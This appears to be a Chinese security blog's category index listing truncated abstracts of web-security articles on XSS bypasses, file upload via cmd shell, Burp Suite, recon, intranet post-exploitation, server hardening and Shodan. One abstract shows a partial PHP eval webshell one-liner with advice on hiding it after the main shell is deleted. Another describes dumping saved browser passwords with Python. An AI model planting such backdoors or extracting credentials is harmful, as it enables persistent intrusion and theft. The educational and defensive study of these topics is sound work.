文章分类 - Web安全
摘要:漏洞详情 披露状态: 2011-11-15: 细节已通知厂商并且等待厂商处理中2011-11-15: 厂商已查看当前漏洞内容,细节仅向厂商公开2011-11-16: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: 又是一个之前反馈的漏洞,也提交到乌云上来。 此漏洞在原理上和我提交的QQ微博的XSS
阅读全文
摘要:0x00 前言 在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmd shell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。 图片来自于http://www.telegraph.co.uk/news/worldnew
阅读全文
摘要:简要描述: 一次很经典的黑盒XSS绕过分析,过滤这么多最终还是搞定了,这姿势应该是乌云首个案例吧!现在乌云太多漏洞报告都是1个url+1张图片的形式了,希望以后能有比较多的像二哥那样的技术分享型的漏洞报告。 详细说明: 1 开始是奔着正文富文本区域去的,测了一会没测出啥给力的东西,然后随手给from
阅读全文
摘要:前言 译者注: 翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常有价值。但是这么著名的一个备忘录却一直没有人把它翻译成中文版。很多人仅仅是简单的把文中的各种代码复制下来,然后看起来很刁的发在各种论坛上,不过你要真去认真研读这些代码,就会完全不知所云了。原因是这篇文章最精华的部分是代码的解释而
阅读全文
摘要:目录 0x00基本介绍 提起XSS 想到的就是插入字符字符编码与各种解析了! 这也就是各种xss编码插件跟工具出世的原因!之前不懂浏览器是如何对我们编码过的代码进行解析的时候就是一顿乱插! 各种编码 各种插 没把编码还原就算了 还原了就算运气好!后来到PKAV经过二哥和短短的调教后才算是弄清楚了一点
阅读全文
摘要:一般大马在管理员发现后后会被删除,上传一些隐蔽的一句话,或者功能简单的脚本。 如果有旁站的话,插入WebShell到旁站。一句话可以插入到某些重要文件中。 插入的时候最好加上判断,可防止报错 Default 1 <?php if(isset($_POST['1'])){eval($_POST['1'
阅读全文
摘要:社会工程学(Social Engineering,又被翻译为:社交工程学)在上世纪60年代左右作为正式的学科出现,广义社会工程学的定义是:建立理论并通过利用自然的、社会的和制度上的途径来逐步地解决各种复杂的社会问题,经过多年的应用发展,社会工程学逐渐产生出了分支学科,如公安社会工程学(简称公安社工学
阅读全文
摘要:如果知道目标的域名,你首先要做的就是通过Whois数据库查询域名的注册信息,Whois数据库是提供域名的注册人信息,包括联系方式,管理员名字,管理员邮箱等等,其中也包括DNS服务器的信息。 1、whois查询网站及服务器信息 如果知道目标的域名,你首先要做的就是通过Whois数据库查询域名的注册信息
阅读全文
摘要:为了更好服务大家在课程中遇到问题,每期我们都会进行一些问题交流和解答。`启程2班人额现在已满,请加启程3班-工具系列`。如果在看视频过程中,遇到相关问题,可以关注我们公众号sec-redclub,把问题发给我们。 为了更好服务大家在课程中遇到问题,每期我们都会进行一些问题交流和解答。启程2班人额现在
阅读全文
摘要:Burp Suite是Web应用程序测试的最佳工具之一,可以对请求的数据包进行拦截和修改,扫描常见的web安全漏洞,暴力破解登录表单、遍历数据等等。 burp简介 Burp Suite是Web应用程序测试的最佳工具之一,可以对请求的数据包进行拦截和修改,扫描常见的web安全漏洞,暴力破解登录表单、遍
阅读全文
摘要:上节课,我们讲了如何使用burp抓取数据包,以及proxy的一些常用功能;这节课,我们主要学习scanner、intruder、repeater等等。 intruder功能 标识符枚举用户名,ID和账户号码, 模糊测试SQL注入,跨站,目录遍历等等首先,打开burp,并进入到proxy功能,可以看到
阅读全文
摘要:*本文原创作者:feiniao,属于FreeBuf原创奖励计划,禁止转载。 1. 概述 上段时间一直忙于处理大会安全保障与应急,借助公司云悉情报平台,发现并处置几十起网站被劫持的情况。对黑客SEO技术颇有感觉。正好这段时间有时间,把以前遇到比较有趣的案例和大家分享一下。里面很多技术其实早已被玩透,只
阅读全文
摘要:写在前面: 第一次翻译长篇文档,如有疏漏还请各位大牛指正。OWASP的这篇速查表虽然时间比较久了,但还在更新,所以还是翻译出来了。翻译完发现里面还是有一些值得借鉴的思路,用来涨知识还是可以的。由于篇幅较长,推荐各位可以收藏起来,用的时候再来查= ̄ω ̄= 1.介绍 这篇文章的主要目的是给专业安全测试人
阅读全文
摘要:名词解释 内网: 仅包括内部员工使用的pc终端和仅提供内部服务的服务器系统 后渗透: 在拿下内网某终端的基础上对内网的进一步渗透攻击 概述 众所周知网络隔离策略、杀软、入侵检测阻止系统等都是防止终端设备感染恶意程序的重要措施,但没有任何人、任何组织可以说自己的防御是100%的(最近的各种热门入侵事件
阅读全文
摘要:0x01 前言 日防夜防,但指不定哪天又有0day出来,或是有其它漏洞,网站被日,我们的服务器又要出现中毒、被留后门等等现象。而如何做好了权限配置,即使网站沦陷,但是攻击者能获得的权限很低的话,就做不了进一步的操作了,所以本文章主要讲讲网站如何在权限上做好安全配置,让日站少年无从下手。 0x02 网
阅读全文
摘要:对于XSS的漏洞挖掘过程,其实就是一个使用Payload不断测试和调整再测试的过程,这个过程我们把它叫做Fuzzing;同样是Fuzzing,有些人挖洞比较高效,有些人却不那么容易挖出漏洞,除了掌握的技术之外,比如编码的绕过处理等,还包含一些技巧性的东西,掌握一些技巧和规律,可以使得挖洞会更加从容。
阅读全文
摘要:0×00 简介 0×01 解码过程总述 0×02 浏览器中的词法分析 0×03 HTML编码与HTML解析 0×04 常见误区 0×05 浏览器有趣的容错行为 0×06 结语 *原创作者:VillanCh 0×00 简介 编码问题一直是一个痛点,在wooyun有一篇XSS编码的文章,讲到一些痛点,既
阅读全文
摘要:1.生成服务器证书: 进入命令行模式输入: keytool -genkey -v -alias tomcat -keyalg RSA -keystore E:\SSL\imooc.keystore -validity 365 (参数说明:genkey生成方式:对称或这非对称.alias定义别名.E:
阅读全文
摘要:CNN 曾在 2013 年 4 月 8 日 的新闻报道中称 Shodan 是“互联网上最可怕的搜索引擎”。 甚至光是听它的名字,就让人觉得不寒而栗! 那只是三年前对 Shodan 的描述,而三年后的今天,随着物联网的不断普及,Shodan 也将变得更加强大和可怕!对于那些还不了解 Shodan 的人
阅读全文
摘要:前言 早就听闻FreeBuf评论区大神多,作为一个菜鸟,在极度惶恐下发表这篇文章只为抛砖引玉,让众多萌新开阔视野。 本文将会演示怎样使用Python导出Windows系统上浏览器保存的密码、书签、浏览历史等敏感数据。由于时间和个人能力关系,所涉及的浏览器种类、版本有限,还望有大神不吝赐教。 环境搭建
阅读全文
浙公网安备 33010602011771号